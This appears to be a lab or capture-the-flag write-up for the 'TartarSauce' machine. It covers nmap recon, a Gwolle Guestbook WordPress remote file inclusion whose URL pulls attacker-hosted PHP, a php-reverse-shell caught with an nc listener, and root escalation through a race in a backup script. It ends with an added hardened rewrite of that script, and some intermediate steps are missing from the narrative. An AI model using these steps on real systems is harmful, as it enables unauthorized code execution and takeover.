Vulnerability Explanation: The machine is vulnerable to Remote File Inclusion (RFI) in a WordPress plugin, which can be exploited by an unauthenticated attacker to include a remote PHP file and execute arbitrary code on the vulnerable system.
Privilege Escalation Vulnerability: Misconfigured permissions
Vulnerability Fix: Apply the vendor patch and restrict permissions
Severity: High
Steps to Compromise the Host:
Reconnaissance
└─$ nmap -p- -sC -sV -T4 10.10.10.88
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 09:46 EST
Nmap scan report for 10.10.10.88
Host is up (0.047s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
Enumeration
Port 80 Apache httpd 2.4.18
Only port 80 is open on the machine. Let's check it out. It is just a simple webpage.
Let's go through /robots.txt to check whether there are other directories we can access.
Of those 5 disallowed entries, we can access /webservices/monstra-3.0.4/, which displays a webpage.
I just clicked every button available in the application to see how it works. We just see one more login page, of Monstra version 3.0.4.
I tried logging in with the credentials admin/admin and it worked.
Let's search for a public exploit in case this version of the application is vulnerable.
Checking the script of the Remote File Inclusion exploit.
Advisory Details:
High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in the Gwolle Guestbook WordPress plugin, which can be exploited by a non-authenticated attacker to include a remote PHP file and execute arbitrary code on the vulnerable system.
The HTTP GET parameter "abspath" is not properly sanitized before being used in the PHP require() function. A remote attacker can include a file named 'wp-load.php' from an arbitrary remote server and execute its content on the vulnerable web server. In order to do so, the attacker needs to place a malicious 'wp-load.php' file into his server's document root and include the server's URL in the request:
http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]
Modify the php-reverse-shell code with our IP and port and rename the file to wp-load.php. Then start an HTTP server to share the file.
python -m SimpleHTTPServer 80
Also start a netcat listener on port 4444.
nc -lvp 4444
Let's browse to the path that is vulnerable to RFI and point it at our Kali machine.
onuma@TartarSauce:/usr/sbin$ cat backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
Let's wait 5 minutes and check the folder, where we find another file.
onuma@TartarSauce:/var/tmp$ systemctl list-timers
WARNING: terminal is not fully functional
NEXT LEFT LAST PASSED UNIT
Sun 2021-11-14 01:00:43 EST 4min 9s left Sun 2021-11-14 00:55:43 EST 50s ago backupere
Sun 2021-11-14 06:43:27 EST 5h 46min left Sat 2021-11-13 21:29:01 EST 3h 27min ago apt-daily
Sun 2021-11-14 15:41:53 EST 14h left Sat 2021-11-13 21:29:01 EST 3h 27min ago apt-daily
Sun 2021-11-14 21:44:05 EST 20h left Sat 2021-11-13 21:44:05 EST 3h 12min ago systemd-t
onuma@TartarSauce:/var/tmp$ ls -la
total 48
drwxrwxrwt 10 root root 4096 Nov 14 00:56 .
drwxr-xr-x 14 root root 4096 Feb 9 2018 ..
-rw-r--r-- 1 onuma onuma 2649 Nov 14 00:56 .67ea8f0ff41222a4114795e2bf4fcadf4b103557
-rw-r--r-- 1 onuma onuma 2649 Nov 14 00:45 exploit.tar.gz
drwx------ 3 root root 4096 Feb 17 2018 systemd-private-46248d8045bf434cba7dc7496b9776d4-systemd-timesyncd.service-en3PkS
drwx------ 3 root root 4096 May 29 2020 systemd-private-4e3fb5c5d5a044118936f5728368dfc7-systemd-timesyncd.service-SksmwR
drwx------ 3 root root 4096 Feb 17 2018 systemd-private-7bbf46014a364159a9c6b4b5d58af33b-systemd-timesyncd.service-UnGYDQ
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-9214912da64b4f9cb0a1a78abd4b4412-systemd-timesyncd.service-bUTA2R
drwx------ 3 root root 4096 Nov 13 21:29 systemd-private-95ccd26449184dbc83964cfdc326334d-systemd-timesyncd.service-IRbjIi
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-a3f6b992cd2d42b6aba8bc011dd4aa03-systemd-timesyncd.service-3oO5Td
drwx------ 3 root root 4096 Feb 15 2018 systemd-private-c11c7cccc82046a08ad1732e15efe497-systemd-timesyncd.service-QYRKER
drwx------ 3 root root 4096 Sep 25 2020 systemd-private-e11430f63fc04ed6bd67ec90687cb00e-systemd-timesyncd.service-PYhxgX
Then copy exploit.tar.gz to .67ea8f0ff41222a4114795e2bf4fcadf4b103557 and wait 5 minutes.
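The weakness in backuperer is the sequence shown above: root backgrounds a tar that runs as onuma, sleeps 30 seconds while the archive sits in world-writable /var/tmp owned by onuma, then extracts and diffs whatever is in that file as root. Below is an added hardened rewrite of that routine (example code, not the box's own script and not from the original write-up); it assumes the base and backup directories are passed as arguments so it can be exercised on any tree.

```shell
#!/bin/bash
# Added example: hardened rewrite of the backuperer routine (not the box's script).
# Differences from the original:
#  - archive and extraction dir live in a fresh mode-0700 directory created with
#    mktemp under the backup dir, not in world-writable /var/tmp;
#  - tar runs in the foreground, so there is no background job + 30 s sleep in
#    which another local user can replace the archive before root extracts it;
#  - members are listed and the archive rejected if any name is absolute or
#    contains '..', before anything is extracted.
# Assumption for the example: base dir and backup dir are passed as arguments.
set -u

# 0 if no member name starts with '/' or has a '..' path component.
archive_paths_ok() {
    ! tar -tzf "$1" | grep -Eq '(^/|(^|/)\.\.(/|$))'
}

backup_tree() {
    local basedir="$1" bkpdir="$2"
    local work archive check
    work=$(mktemp -d "$bkpdir/.backuperer.XXXXXXXX") || return 1
    chmod 700 "$work"
    archive="$work/archive.tgz"
    check="$work/check"
    # Store members relative to the parent dir (html/...).
    if ! tar -zcf "$archive" -C "$(dirname "$basedir")" "$(basename "$basedir")"; then
        rm -rf "$work"; return 1
    fi
    if ! archive_paths_ok "$archive"; then
        rm -rf "$work"; return 3
    fi
    mkdir "$check"
    if ! tar -zxf "$archive" -C "$check"; then
        rm -rf "$work"; return 1
    fi
    # Integrity check: the extracted copy must match the live tree.
    if ! diff -r "$basedir" "$check/$(basename "$basedir")" >/dev/null; then
        rm -rf "$work"; return 2
    fi
    mv "$archive" "$bkpdir/onuma-www-dev.bak"
    rm -rf "$work"
    return 0
}

# As a script: backuperer-hardened /var/www/html /var/backups
if [ "$#" -eq 2 ]; then
    backup_tree "$1" "$2"
fi
```

Return codes mirror the original (2 for an integrity mismatch) with 3 added for a rejected member path, so a timer unit can alert on either.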